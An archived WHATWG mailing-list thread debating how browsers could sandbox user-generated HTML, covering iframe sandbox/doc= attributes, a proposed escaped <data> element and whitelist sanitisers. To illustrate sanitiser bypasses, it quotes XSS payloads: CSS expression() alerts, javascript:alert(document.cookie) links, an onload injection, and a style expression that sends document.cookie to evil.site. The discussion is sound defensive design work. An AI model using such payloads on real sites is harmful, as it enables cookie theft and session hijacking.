Re: [whatwg] Sandboxing to accommodate user generated content.
On Tue, 17 Jun 2008, Frode Børli wrote:
> A major challenge for many web developers is validating untrusted content such as the message body of a blog comment. Unless the developer has a flawless and future-proof algorithm for ensuring that the message body does not contain any script, web developers have to resort to text-only or bbCode-style markup languages to allow users to post text content with richer formatting. [...]
>
> Another problem which makes future-proofing this type of security difficult is that standards evolve. A few years ago you could safely allow users to apply CSS styles to tags. [...]

In general, using whitelisting and a real parser and serialiser combination, e.g. what html5lib does now, allows one to have a pretty secure and future-proof sanitiser.

> One solution: <htmlarea>User generated content</htmlarea>
>
> No scripts would ever be allowed to be executed inside this tag. Malicious users could potentially submit "</htmlarea> unsafe content <htmlarea>" and get around this. As far as I can see, there are two solutions to this: user generated content inside the tag must be escaped using HTML entities (but still rendered as HTML by the user agent), or the author must prevent users from submitting the string </htmlarea> and all possible variations of the tag. If the first solution is used, then browsers should display a strong security warning if unescaped content is seen between htmlarea tags on a website (to educate web developers).

HTML5 now has something similar to this:

   <iframe sandbox src="data:text/html;base64,..."></iframe>

...where "..." is the sanitised user-provided content, base64-encoded.

On Tue, 17 Jun 2008, Frode Børli wrote:
> In the discussions I find that backward compatibility is absolutely the most important issue. Second is that it must be easy for web developers to use the features.
> The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems:
>
> 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again.

The CSS can be embedded in the iframed snippets in the transition period; in the long term, the seamless attribute side-steps this issue.

> 2: The use of src= yields problems with iframe heights (since the src URL must be hosted on another server, JavaScript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.

The seamless attribute addresses this also, though admittedly there is no good short-term fix for this.

> 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment.

With data: URLs, all the comments can be included in the original request.

> 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates.

This is a problem with any solution that is intended to work with today's browsers without server-side sanitisation, indeed.

> If we add a new element <htmlarea></htmlarea>, old browsers will run scripts, while new browsers will stop scripts and this is a major problem.

Indeed.

> Suppose HTML 5 browsers require everything between <htmlarea></htmlarea> to be HTML entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.

How would the browser know when the </htmlarea> tag is the actual end tag or just something that the author forgot to escape?

> HTML 4 browsers will never run scripts (since they will only see plain text). HTML 5 browsers will display rich text.
> It would be completely secure for both HTML 4 and HTML 5 browsers. A simple JavaScript could clean up the HTML markup for HTML 4 browsers.

Wouldn't that reintroduce the security bugs?

On Wed, 18 Jun 2008, Frode Børli wrote:
> I have written a sanitizer for HTML and it is very difficult, especially since browsers have undocumented bugs in their parsing. Example:
>
>    <div colspan=&amp; style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41 colspan=&amp;>Red</div>

A sanitiser that did what I describe above would not be affected by this (or any other similar problem). Basically, you would have to parse the content using the HTML5 parser rules, and then reserialise the content, dropping any element or attribute or attribute value that is not explicitly whitelisted. It is critical that for every allowed attribute, the value be parsed using the relevant rules (e.g. as CSS for style=, as a URL for href=, etc.), and then the values therein reserialised in the same manner for that language (e.g. only serialising CSS properties that have whitelisted property values).

Yes,
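The `<iframe sandbox src="data:text/html;base64,...">` form mentioned in this message can be produced on the server roughly as follows. This is only a sketch in Python (the thread names no server language); the function name `sandboxed_iframe` is hypothetical, and the input is assumed to have been sanitised already.

```python
import base64
import html


def sandboxed_iframe(sanitised_markup: str) -> str:
    """Wrap already-sanitised markup in a sandboxed iframe via a data: URL.

    Hypothetical helper: it does no sanitising itself, it only encodes.
    """
    # Base64 output contains only A-Z, a-z, 0-9, "+", "/" and "=", so the
    # user's markup can never terminate the src attribute early.
    payload = base64.b64encode(sanitised_markup.encode("utf-8")).decode("ascii")
    src = "data:text/html;base64," + payload
    return '<iframe sandbox src="{}"></iframe>'.format(html.escape(src, quote=True))


if __name__ == "__main__":
    print(sandboxed_iframe("<p>First <b>comment</b></p>"))
```

Because every comment is carried inside the page itself, a page listing 60 comments still needs only the one original request, which is the point made above about data: URLs.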
Re: [whatwg] Sandboxing to accommodate user generated content.
Frode Børli wrote:
> I have been reading up on past discussions on sandboxing content, and [...]
>
> My main arguments for having this feature (in one form or another) in the browser are:
> - It is future proof. Changes to browsers (for example adding expression support to CSS) will never again require old sanitizers to be updated.

Unless some braindead vendor is going to add a scripting-in-sandboxing feature, which would be just as braindead as unlimited expression support in CSS. You cannot be future proof unless you trust all the players, including ALL possible browser vendors.

> If the sanitiser uses a whitelist based approach that forbids everything by default, and then only allows known elements and attributes; and in the case of the style attribute, known properties and values that are safe, then that would also be the case.
>
> I have written a sanitizer for HTML and it is very difficult, especially since browsers have undocumented bugs in their parsing. Example:
>
>    <div colspan=&amp; style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41 colspan=&amp;>Red</div>

Every real sanitizer MUST parse the input and generate its internal DOM. If you then generate a known good serialization of that DOM, there's no way your sanitizer would ever output such code. I, too, have written my own simplified HTML parser that converts all unknown parts to data (that is, escapes all the following characters: <>&"').

Just parse the input into a DOM and only after that check it for safe content. You cannot sanitize HTML using only string replacements without generating a DOM (the whole DOM does not need to be in memory at once; it's possible to process the input as a stream, handle one tag at a time, and only keep a stack of open tag names in addition).

> The proof that sanitizing HTML is difficult is the fact that no major site even attempts it. Even Wikipedia uses some obscure wiki-language, instead of implementing a WYSIWYG editor.

Wikipedia does sanitize HTML in the content.
It does support its own wiki-language in addition to HTML. For example, try to input the following text as is in the Wikipedia sandbox page and press "Show preview":

***
Example: <div colspan=&amp; style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41 colspan=&amp;>Red</div>
Some <b>more</b> content <i>here</i>.
***

Works just fine. The content is sanitized and unrecognized parts are converted to data. Correctly written parts are used as HTML tags.

Trust me, it's really not that hard. The hard part is to decide which tags, which attributes and which attribute values you want to allow. And you have to decide that by yourself - there's no magic silver bullet safe feature set that is suitable for every usage and for every site. If you don't want to go through all this trouble, do not try to allow HTML or any other markup in user generated content unless you *really* trust your users.

> Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server, it's just an extra line of defence in case something slips through.
>
> Of course. However, the sandbox feature in the browser will be fail-safe if user generated content is escaped with &lt; and &gt; before being sent to the browser - as long as the browser does not have bugs, of course.

That's a pretty big if. If the page author / server application programmer is always able to escape content correctly, how much harder is it to correctly escape and sanitize the content anyway? All this sounds too much like magic_quotes in PHP...

> A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character < or > is encountered inside a data tag.
>
> If a developer forgot to escape the markup at all, then a user could enter </data><script>...</script> and do anything they wanted.
>
> Yes, that is my point. That is why I want the sandbox to display a severe security warning if the developer has forgotten to escape it.
Isn't that a bit too late? If the developer is not testing his application before the release, what's the point of breaking the whole site in the user's browser as a result? It will not guard against XSS, because the user generated content can be *first* used to end the sandbox and *then* used to insert an XSS attack. The browser sees only valid content in the sandbox and the site is still under XSS attack.

> This method will be safe for all browsers that have ever existed and that will ever exist in the future. If new features are introduced in some future version of CSS or HTML - the sandbox is still there and the applications created today do not need to have their sanitizers updated, ever.

That's a pretty bold claim! I guess that a similar claim could have been made about CSS support before Microsoft added the expression() value syntax. Can *you* guarantee that a random browser vendor does not implement anything stupid for the sandbox content in the future?

-- 
Mikko
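The approach argued for in this message (parse the input, keep a stack of open tag names, emit a known good serialisation, and convert everything unrecognised to data) can be sketched as below. This is an illustration only, not the sanitizer described by anyone in the thread: it uses Python's standard `html.parser`, which does not follow the HTML5 parsing rules, and the `ALLOWED` whitelist and `SAFE_URL_PREFIXES` values are made-up assumptions that each site would have to choose for itself.

```python
import html
from html.parser import HTMLParser

# Hypothetical whitelist for illustration; every site has to choose its own.
ALLOWED = {"b": set(), "i": set(), "p": set(), "a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://")


class WhitelistSanitizer(HTMLParser):
    """Parse markup and re-emit only whitelisted tags; the rest becomes text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # pieces of the known-good serialisation
        self.open_tags = []  # stack of whitelisted tags that are still open

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            # Unknown markup is converted to data by escaping the raw tag text.
            self.out.append(html.escape(self.get_starttag_text()))
            return
        kept, seen = [], set()
        for name, value in attrs:
            if name not in ALLOWED[tag] or name in seen or value is None:
                continue
            if name == "href" and not value.lower().startswith(SAFE_URL_PREFIXES):
                continue
            seen.add(name)
            kept.append(' {}="{}"'.format(name, html.escape(value, quote=True)))
        self.out.append("<{}{}>".format(tag, "".join(kept)))
        self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag not in ALLOWED:
            self.out.append(html.escape("</{}>".format(tag)))
        elif tag in self.open_tags:
            # Close anything still open inside this element so output nests.
            while True:
                top = self.open_tags.pop()
                self.out.append("</{}>".format(top))
                if top == tag:
                    break
        # A stray end tag for a whitelisted element is simply dropped.

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize(markup):
    parser = WhitelistSanitizer()
    parser.feed(markup)
    parser.close()
    while parser.open_tags:  # close whatever the user left open
        parser.out.append("</{}>".format(parser.open_tags.pop()))
    return "".join(parser.out)
```

Since `div` and `style` are not in this example whitelist, the `<div ... style=...expression...>` example from the thread comes out as escaped text rather than as an element, while `<b>` and `<i>` pass through unchanged.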
Re: [whatwg] Sandboxing to accommodate user generated content.
Let's sort things out, folks. There is nothing in the spec to prevent a browser vendor from formatting the user's hard drive and draining her bank account as a bonus when the page displayed contains the string D357R0Y!N0\V!. The spec does not tell the vendors what not to do, therefore it cannot guarantee anything in this respect. The spec provides a reference implementation and it is our job not to let harmful extensions in here; what happens in the wild is beyond our control.

IMHO,
Chris

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Mikko Rantalainen
Sent: Wednesday, June 18, 2008 9:20 AM
To: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

Frode Børli wrote:
> I have been reading up on past discussions on sandboxing content, and [...]
>
> My main arguments for having this feature (in one form or another) in the browser are:
> - It is future proof. Changes to browsers (for example adding expression support to CSS) will never again require old sanitizers to be updated.

Unless some braindead vendor is going to add a scripting-in-sandboxing feature, which would be just as braindead as unlimited expression support in CSS. You cannot be future proof unless you trust all the players, including ALL possible browser vendors.

[snip]

> This method will be safe for all browsers that have ever existed and that will ever exist in the future. If new features are introduced in some future version of CSS or HTML - the sandbox is still there and the applications created today do not need to have their sanitizers updated, ever.

That's a pretty bold claim! I guess that a similar claim could have been made about CSS support before Microsoft added the expression() value syntax. Can *you* guarantee that a random browser vendor does not implement anything stupid for the sandbox content in the future?

-- 
Mikko
Re: [whatwg] Sandboxing to accommodate user generated content.
On Tue, 17 Jun 2008 06:09:55 +0200, Frode Børli [EMAIL PROTECTED] wrote:
> Hi! I am a new member of this mailing list, and I wish to contribute a couple of specific requirements that I believe should be discussed and perhaps implemented in the final specification. I am unsure if this is the correct place to post my ideas (or if my ideas are even new), but if it is not, then I am sure somebody will instruct me. :)
>
> One person told me that the specification was finished and no new features would be added from now on - but hopefully that is not true.

That is actually true. However, sandboxing has been proposed in the past and is therefore still considered in scope. (Unless of course we decide it's out of scope, but given the sandboxing features already in the specification, I expect that not to be the case.)

> One solution: <htmlarea>User generated content</htmlarea>

As you note, this solution has significant issues. Besides the problem of inserting </htmlarea>, it would also allow execution of scripts in legacy user agents and is therefore not really backwards compatible.

I believe the idea to deal with this is to add another attribute to <iframe>, besides the sandbox= and seamless= attributes we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or "). The fallback for legacy user agents would be the src= attribute.

-- 
Anne van Kesteren
http://annevankesteren.nl/
http://www.opera.com/
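A rough sketch of how a server might fill the proposed doc= attribute is shown below. The function names are hypothetical, and doc= is used exactly as proposed in this message. One assumption goes beyond the message: the sketch escapes `&` as well as the quotation character, because attribute values have character references decoded, so an unescaped `&lt;` in user text would otherwise turn back into `<` inside the framed document.

```python
import html


def escape_attribute(value: str) -> str:
    """Escape a value for use inside a double-quoted HTML attribute."""
    # "&" must go first, otherwise the "&" of "&quot;" would be escaped again.
    return value.replace("&", "&amp;").replace('"', "&quot;")


def decode_attribute(value: str) -> str:
    """Approximate what a browser recovers from the attribute value."""
    return html.unescape(value)


def iframe_with_doc(markup: str, fallback_src: str) -> str:
    """Hypothetical helper: inline markup in doc=, with src= for legacy agents."""
    return '<iframe sandbox doc="{}" src="{}"></iframe>'.format(
        escape_attribute(markup), escape_attribute(fallback_src)
    )


if __name__ == "__main__":
    print(iframe_with_doc('<p class="x">a &lt; b</p>', "https://comments.example/1"))
```

The URL `https://comments.example/1` is a placeholder for wherever the fallback document would be hosted.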
Re: [whatwg] Sandboxing to accommodate user generated content.
I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly.

My main arguments for having this feature (in one form or another) in the browser are:
- It is future proof. Changes to browsers (for example adding expression support to CSS) will never again require old sanitizers to be updated.
- It does not require much skill and effort from the web developer to safely sanitize user content.
- Security bugs are fixed by browser vendors, and not by each web developer.

In the discussions I find that backward compatibility is absolutely the most important issue. Second is that it must be easy for web developers to use the features.

The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems:

1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again.
2: The use of src= yields problems with iframe heights (since the src URL must be hosted on another server, JavaScript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.
3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that Perl/PHP scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations, counting the page itself.
4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates.

I do not believe this solution will ever be used.

My solution:

If we add a new element <htmlarea></htmlarea>, old browsers will run scripts, while new browsers will stop scripts, and this is a major problem.

Suppose instead that HTML 5 browsers require everything between <htmlarea></htmlarea> to be HTML entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.

HTML 4 browsers will never run scripts (since they will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple JavaScript could clean up the HTML markup for HTML 4 browsers.

> I believe the idea to deal with this is to add another attribute to <iframe>, besides the sandbox= and seamless= attributes we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or "). The fallback for legacy user agents would be the src= attribute.

-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no
Mobile: +47 406 16 637
Company: +47 216 90 000
Fax: +47 216 91 000

Think about the environment. Do not print this e-mail unless you really need to.
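The escaping rule proposed in this message, and the check a browser would need in order to raise the proposed warning, can be sketched as follows. The function names are hypothetical and the check is only a server-side approximation written in Python. It also shows the weakness raised in other replies in this thread: if the developer forgets to escape and the user closes the element early, each block still looks clean.

```python
import html
import re


def escape_for_htmlarea(user_markup: str) -> str:
    """Entity-escape user markup and wrap it in the proposed element."""
    return "<htmlarea>{}</htmlarea>".format(html.escape(user_markup, quote=False))


_BLOCK = re.compile(r"<htmlarea>(.*?)</htmlarea>", re.DOTALL | re.IGNORECASE)


def has_unescaped_markup(page: str) -> bool:
    """Return True if any htmlarea block contains a raw < or >."""
    return any("<" in body or ">" in body for body in _BLOCK.findall(page))


if __name__ == "__main__":
    good = escape_for_htmlarea("<b>hi</b>")
    print(good, has_unescaped_markup(good))

    # Developer forgot to escape; the user closed the element and reopened it.
    attack = "<htmlarea>nice post</htmlarea><script>evil()</script><htmlarea></htmlarea>"
    print(has_unescaped_markup(attack))  # the check sees two clean blocks
```

In the `attack` string the script sits outside both blocks, so a warning keyed on unescaped content inside the element never fires.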
Re: [whatwg] Sandboxing to accommodate user generated content.
1. Please elaborate on how an extension of CSS would require a sanitizer update.

2. Please explain why using a dedicated tag with double parsing is easier for a Web developer than putting the code in an attribute.

3. Your quoting solution would not cause legacy browsers to show plain text; they would show HTML code, which is probably much worse than showing plain text. If you mean JavaScript can be used to extract plain text, I doubt it will be simple; there are probably lots of junctions where this procedure can derail.

4. Please explain why you consider network efficiency for legacy user agents essential. I believe that the correlation between efficiency and compatibility is negative in general. If that causes server overload, the server can discriminate content depending on the user agent; this is a temporary solution to an edge case and it should probably be acceptable. Besides, a blog page with 60 comments on it is rather hard to render and read, so you should probably consider other display options in this case.

5. I am not sure why IFRAME content must be HTTP-secured if the containing page is. The specification does not impose such a restriction AFAIK. And, if you need to go secure, do not allow scribbling in the first place, right?

Please take these points as a challenge, not as an attempt to let you down. I personally think your idea is worth considering.

Chris

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 3:05 PM
To: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

[snip]
Re: [whatwg] Sandboxing to accommodate user generated content.
Hello,

I'm new to the list and have joined in response to this discussion on HTML security changes.

> I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly.
>
> In the discussions I find that backward compatibility is absolutely the most important issue. Second is that it must be easy for web developers to use the features.
>
> The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems:
>
> 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again.
> 2: The use of src= yields problems with iframe heights (since the src URL must be hosted on another server, JavaScript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.
>
> My solution:
>
> If we add a new element <htmlarea></htmlarea>, old browsers will run scripts, while new browsers will stop scripts, and this is a major problem.
>
> Suppose instead that HTML 5 browsers require everything between <htmlarea></htmlarea> to be HTML entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.
>
> HTML 4 browsers will never run scripts (since they will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple JavaScript could clean up the HTML markup for HTML 4 browsers.
I've also been having side discussions with a few people regarding the ability for a website owner to mark sections as data rather than code (where everything lies now). Your htmlarea tag idea is a good one (maybe change the tag to data, just a nitpick); however, you don't address the following use case:

   <data> user supplied input </data>

If the user injects </data> then game over. A solution I discovered for this problem (as others have too, I'm sure, who aren't speaking up) borrows from the defenses against cross-site request forgery (CSRF), where a non-guessable token is used. Take the following example:

   <data id=GUID> </data> </data id=GUID>

GUID would be a temporary GUID value such as 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user session. An attacker would be unable to break out of a data tag because they couldn't guess the closing ID value. This is something that could be built into a web framework (JSP tag/PHP function/ASP.NET component), which could handle the token generation portion to assist with adoption.

A few notes on this approach:
- data (or htmlarea, whatever you call it) cannot be nested.
- All content inside data tags would need to be treated as text or handled as HTML entity encoded values before processing.

> I believe the idea to deal with this is to add another attribute to <iframe>, besides the sandbox= and seamless= attributes we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or "). The fallback for legacy user agents would be the src= attribute.

To take this a step further, there may be situations where user content is reflected inside HTML tags, such as '<a href="user generated value">foo</a>'. For situations like this an additional attribute (along the lines of what you propose) could be added to this tag (or any tag for that matter) to instruct the browser that no script/HTML can execute.
   <a sandbox=true href="javascript:alert(document.cookie)">asd</a>
   <a sandbox=true href="injected value">asd</a>
   (injected value onload=javascript:alert('wooot') foo=bar)

In this example the developer would allow user content to be inserted into the href value as desired, but disallow script injection as well as breaking out of the HTML attribute, by specifying this attribute on the tag (i.e. everything inside each attribute is treated as HTML entity data/text).

My 0.04.

Regards,
- Robert Auger
http://www.webappsec.org/
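The non-guessable closing token described in this message can be sketched on the framework side as below. All names are hypothetical, and `untrusted_span` only approximates what a browser implementing the proposal would do: it ignores any `</data>` that does not carry the session token.

```python
import secrets


def new_token() -> str:
    """Generate an unguessable token; the message suggests tying it to the session."""
    return secrets.token_hex(16)


def wrap_untrusted(content: str, token: str) -> str:
    """Wrap user content in a data element whose end tag repeats the token."""
    return '<data id="{0}">{1}</data id="{0}">'.format(token, content)


def untrusted_span(page: str, token: str):
    """Return the text between the tokenised tags, or None if they are absent."""
    opener = '<data id="{}">'.format(token)
    closer = '</data id="{}">'.format(token)
    start = page.find(opener)
    if start < 0:
        return None
    start += len(opener)
    end = page.find(closer, start)
    if end < 0:
        return None
    return page[start:end]


if __name__ == "__main__":
    token = new_token()
    evil = "hi</data><script>steal()</script>"
    page = "<p>Comments:</p>" + wrap_untrusted(evil, token) + "<p>footer</p>"
    # The injected </data> lacks the token, so it stays inside the data span.
    print(untrusted_span(page, token) == evil)
```

A fresh token per response is what makes the scheme work, which is also why it is hard to combine with server-side caching of rendered pages.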
Re: [whatwg] Sandboxing to accommodate user generated content.
> I've also been having side discussions with a few people regarding the ability for a website owner to mark sections as data rather than code (where everything lies now). Your htmlarea tag idea is a good one (maybe change the tag to data, just a nitpick); however, you don't address the following use case:
>
>    <data> user supplied input </data>

I have considered your idea (below) but found that it would not allow efficient server-side caching, which is often needed. If instead all HTML inside <data></data> must be escaped like this:

   <data> &lt;user supplied input&gt; </data>

then this will be secure for both HTML 4 and HTML 5 browsers. HTML 4 browsers will display HTML source, while HTML 5 browsers will display correctly formatted content.

A simple JavaScript like this (untested) would make the data tags readable for HTML 4 browsers:

   var els = document.getElementsByTagName("DATA");
   // Indexed loop: for-in would also visit "length" and "item".
   for (var i = 0; i < els.length; i++)
       els[i].innerHTML = els[i].innerHTML.replace(/<[^>]*>/g, "").replace(/\n/g, "<br>");

A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character < or > is encountered inside a data tag.

> If the user injects </data> then game over. A solution I discovered for this problem (as others have too, I'm sure, who aren't speaking up) borrows from the defenses against cross-site request forgery (CSRF), where a non-guessable token is used. Take the following example:
>
>    <data id=GUID> </data> </data id=GUID>
>
> GUID would be a temporary GUID value such as 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user session. An attacker would be unable to break out of a data tag because they couldn't guess the closing ID value. This is

*snip*

> I believe the idea to deal with this is to add another attribute to <iframe>, besides the sandbox= and seamless= attributes we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ").
> The fallback for legacy user agents would be the src= attribute.
>
> To take this a step further, there may be situations where user content is reflected inside HTML tags, such as '<a href="user generated value">foo</a>'. For situations like this an additional attribute (along the lines of what you propose) could be added to this tag (or any tag for that matter) to instruct the browser that no script/HTML can execute.
>
>    <a sandbox=true href="javascript:alert(document.cookie)">asd</a>
>    <a sandbox=true href="injected value">asd</a>
>    (injected value onload=javascript:alert('wooot') foo=bar)

Yes, I like this better than a separate tag:

   <div sandbox=1></div>

or

   <div content=untrusted></div>
Re: [whatwg] Sandboxing to accommodate user generated content.
> 1. Please elaborate on how an extension of CSS would require a sanitizer update.

In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a whitelist, which allows only certain tags and attributes. Among the allowed attributes are colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly.

In the year 1999, Internet Explorer 5.0 is released, and it introduces a new invention: CSS expressions. Suddenly the formerly secure web application is no longer secure. A user adds the following code, and it passes the sanitizer easily:

   <span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other brilliant inventions in the future which will break sanitizers. Of course we can't know today which inventions, but the sandboxing means that browser vendors in the future can prevent the above scenario.

> 2. Please explain why using a dedicated tag with double parsing is easier for a Web developer than putting the code in an attribute.

1. The code will still work in Dreamweaver and similar tools.
2. It is not a totally new way of doing things (we already escape content that is put into a textarea in the exact same way as I suggest we put content into the sandbox). Putting a 100 KB piece of user submitted content into an attribute will feel weird - and perhaps even break current parsers.
3. Web developers do not have to create separate scripts to cater for HTML 4 browsers (so that the iframe src= fallback will work).
4. Web developers do not have to create two separate websites (on different domains) that use the same database to make sure that cross-site scripting can't happen from the iframe to the parent document. If the web developer simply places a separate script on the same host, then the fallback will have no security at all.
5. The fallback requires the web developer to know the visible size of the content in advance. HTML 4 browsers do not support any methods of resizing the iframe according to the content when the content of the iframe is from a different domain.

> 3. Your quoting solution would not cause legacy browsers to show plain text; they would show HTML code, which is probably much worse than showing plain text. If you mean JavaScript can be used to extract plain text, I doubt it will be simple; there are probably lots of junctions where this procedure can derail.

I am pretty sure that including a small script similar to this in the main document will make the content very readable, although as plain text:

   <script>
   var els = document.getElementsByTagName("DATA");
   // Indexed loop: for-in would also visit "length" and "item".
   for (var i = 0; i < els.length; i++)
       els[i].innerHTML = els[i].innerHTML.replace(/<[^>]*>/g, "").replace(/\n/g, "<br>");
   </script>

I can guarantee you that with a few hours' work I would have a very good script that does this very well.

> 4. Please explain why you consider network efficiency for legacy user agents essential. I believe that the correlation between efficiency and compatibility is negative in general.

It is not the network efficiency for the user agents I am worried about - it is the server side of things that will be the problem. If the server has to handle 20 separate dynamic requests just to display a single page view then that is unacceptable - and the method will never be used by bigger websites simply because it is not scalable. In fact, it would have already been done if it were a viable option. Please consider my answer to your question number two as well.

> If that causes server overload, the server can discriminate content depending on the user agent; this is a temporary solution to an edge case and it should probably be acceptable.

That is unacceptable. Major websites must accommodate at least 98 % of their user base at any time, and promoting user agent checking on the server side is a major issue for me, and most likely for most other web developers who work on a per-project basis. It would require me to review already launched sites regularly and is hardly an efficient use of my labour.

> Besides, a blog page with 60 comments on it is rather hard to render and read, so you should probably consider other display options in this case.

I am extremely against making assumptions such as "a blog page with 60 comments on it is rather hard to read, so it will never be a problem". I prefer scrolling to clicking "next page" any time. If there is a choice to display 100 comments instead of 10, then I select 100 comments. Also, user generated content might be single line comments, or even just a list of single words.

> 5. I am not sure why IFRAME content must be HTTP-secured if the containing page is. The specification does not impose such a restriction AFAIK. And, if you need to go secure, do not allow scribbling in the first place, right?

1. An insecure iframe in a secure document will give you security warnings from the browser (There are insecure
Re: [whatwg] Sandboxing to accommodate user generated content.
Frode Børli wrote:

> I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly.
>
> My main arguments for having this feature (in one form or another) in the browser are:
>
> - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated.

If the sanitiser uses a whitelist-based approach that forbids everything by default, and then only allows known elements and attributes (and, in the case of the style attribute, known properties and values that are safe), then that would also be the case.

> - It does not require much skill and effort from the web developer to safely sanitize user content.
> - Security bugs are fixed by browser vendors, and not by each web developer.

Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server; it's just an extra line of defence in case something slips through.

> The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems:
>
> 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again.

This is not a major problem. If it uses the same stylesheet, which can be cached by the browser, then at worst it results in a 304 Not Modified response.

> 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.

In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceful degradation.

> 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations.

You could always concatenate all of the comments into a single file, reducing it down to 1 request.

> 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates.

I don't see that as a show stopper.

> My solution: If we add a new element <htmlarea></htmlarea>, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. If HTML 5 browsers require everything between <htmlarea></htmlarea> to be html entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.

Draconian error handling is something we really want to avoid, particularly when such an error can be triggered by failing to handle user generated content properly.

> HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.
In a separate mail, you wrote:

> <data> &lt;user supplied input&gt; </data>
>
> Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4 browsers will display html, while HTML 5 browsers will display correctly formatted code. A simple javascript like this (untested) would make the data tags readable for HTML 4 browsers:
>
>     var els = document.getElementsByTagName("DATA"); for(e in els) els[e].innerHTML = els[e].innerHTML.replace(/<&#91;^>&#93;*>/g, "").replace(/\n/g, "<br>");

